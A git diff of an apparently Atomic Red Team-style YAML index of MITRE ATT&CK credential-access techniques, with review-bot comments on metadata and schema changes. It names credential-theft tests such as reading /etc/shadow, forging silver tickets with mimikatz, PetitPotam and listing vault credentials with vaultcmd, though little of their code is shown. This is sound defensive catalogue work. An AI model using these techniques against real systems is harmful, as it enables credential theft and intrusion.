phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -95727,12 +96477,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -95764,17 +96515,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -95847,7 +96595,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -95896,7 +96643,7 @@ credential-access:
name: bash
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -95905,6 +96652,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -95923,18 +96671,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -95958,13 +96706,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -95990,6 +96735,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -96001,18 +96747,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -96031,9 +96777,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests:
- name: SSH Credential Stuffing From Linux
@@ -96178,7 +96921,7 @@ credential-access:
\ \n"
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -96207,24 +96950,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -96259,13 +97004,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -96343,9 +97085,8 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests:
- name: PetitPotam
@@ -96427,7 +97168,7 @@ credential-access:
elevation_required: false
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -96443,6 +97184,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -96451,13 +97193,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -96465,15 +97207,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -96484,9 +97222,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -96532,7 +97269,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -96551,17 +97288,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -96594,10 +97330,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
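Review bot: for T1556.009 the platform list loses both `Azure AD` and `SaaS` and gains only `Identity Provider`, so `SaaS` is dropped outright rather than renamed, unlike the other techniques in this change (T1621, T1110, T1556.006) where `SaaS` stays next to the new `Identity Provider` entry. Please confirm against the upstream ATT&CK object that narrowing this sub-technique to `IaaS` and `Identity Provider` is intended and not a generator merge artifact.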
@@ -96634,11 +97369,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -96706,34 +97440,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
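Review bot: the T1003.008 description (context lines, not touched by this diff) carries stray line breaks around `/etc/passwd` and `/etc/shadow`, for example `and /etc/shadow` on its own line followed by `to store user account information`, and the detection text in the next hunk has the same problem (`, alerting on the pid,`). These are left over from inline code markup being stripped when the upstream description was converted, and they split sentences across YAML lines. Fixing the markup conversion in the generator cleans every affected technique at once; hand-editing here would be overwritten on the next regeneration.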
@@ -96742,20 +97452,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests:
- name: Access /etc/shadow (Local)
@@ -96889,7 +97621,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -96915,8 +97647,6 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests:
- name: Crafting Active Directory silver tickets with mimikatz
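Review bot: T1558.002 keeps `x_mitre_permissions_required: [User]` while this change strips that field from every other technique, and in the preceding hunk its `modified` value goes back to '2020-03-25T21:46:46.831Z'. Together these suggest this object was taken from an older bundle than the rest of the regeneration; check that the generator reads a single ATT&CK release for all objects, otherwise the file will carry a mix of old and new schema.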
@@ -97002,7 +97732,7 @@ credential-access:
-ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n"
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -97019,24 +97749,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -97077,9 +97807,8 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests:
- name: Access Saved Credentials via VaultCmd
@@ -97110,29 +97839,7 @@ credential-access:
name: powershell
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -97153,6 +97860,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -97167,52 +97875,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
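Review bot: git has matched common lines across two objects here, so the hunk interleaves the tail of T1556.001 (`x_mitre_domains`, `x_mitre_platforms`, the Dell Skeleton and TechNet references) with the head of T1556.005 (`modified: '2024-08-26T15:40:31.871Z'`, the `store_pwd_rev_enc` and `how_pwd_rev_enc` references). A reader can only confirm that no reference was lost by reassembling each object by hand. Regenerating the patch with `--diff-algorithm=patience` or `--indent-heuristic`, or splitting the regeneration by tactic, would make the per-object change reviewable; note also that both objects lose `x_mitre_permissions_required` (Administrator for T1556.001; User and Administrator for T1556.005).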
@@ -97234,6 +97932,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -97244,23 +97943,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
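Review bot: the T1556.005 rewrite drops `x_mitre_permissions_required` (User, Administrator) and `spec_version: '2.1'` while bumping `x_mitre_version` to 1.1 and `x_mitre_attack_spec_version` to 3.2.0, but that removal is not applied uniformly in this change: the Network Device Authentication entry further down keeps `x_mitre_permissions_required: - Administrator` while losing both spec fields. If the field is being retired with the spec bump, retire it everywhere in one pass and say so in the commit message; otherwise anything that filters on it sees a partial dataset. The remainder of this hunk is key reordering (type, id, created, external_references moved below the x_mitre_* fields) with identical values, so a stable key order in the generator would keep future diffs readable.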
@@ -97331,9 +98057,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -97392,7 +98117,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests:
- name: Create Volume Shadow Copy with vssadmin
